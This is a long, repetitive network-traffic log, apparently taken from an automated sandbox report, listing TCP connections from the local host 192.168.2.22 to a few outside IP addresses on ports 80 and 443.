Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 187.45.240.69:80
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 187.45.240.69:80
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 104.18.11.207:80
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 187.45.240.69:80
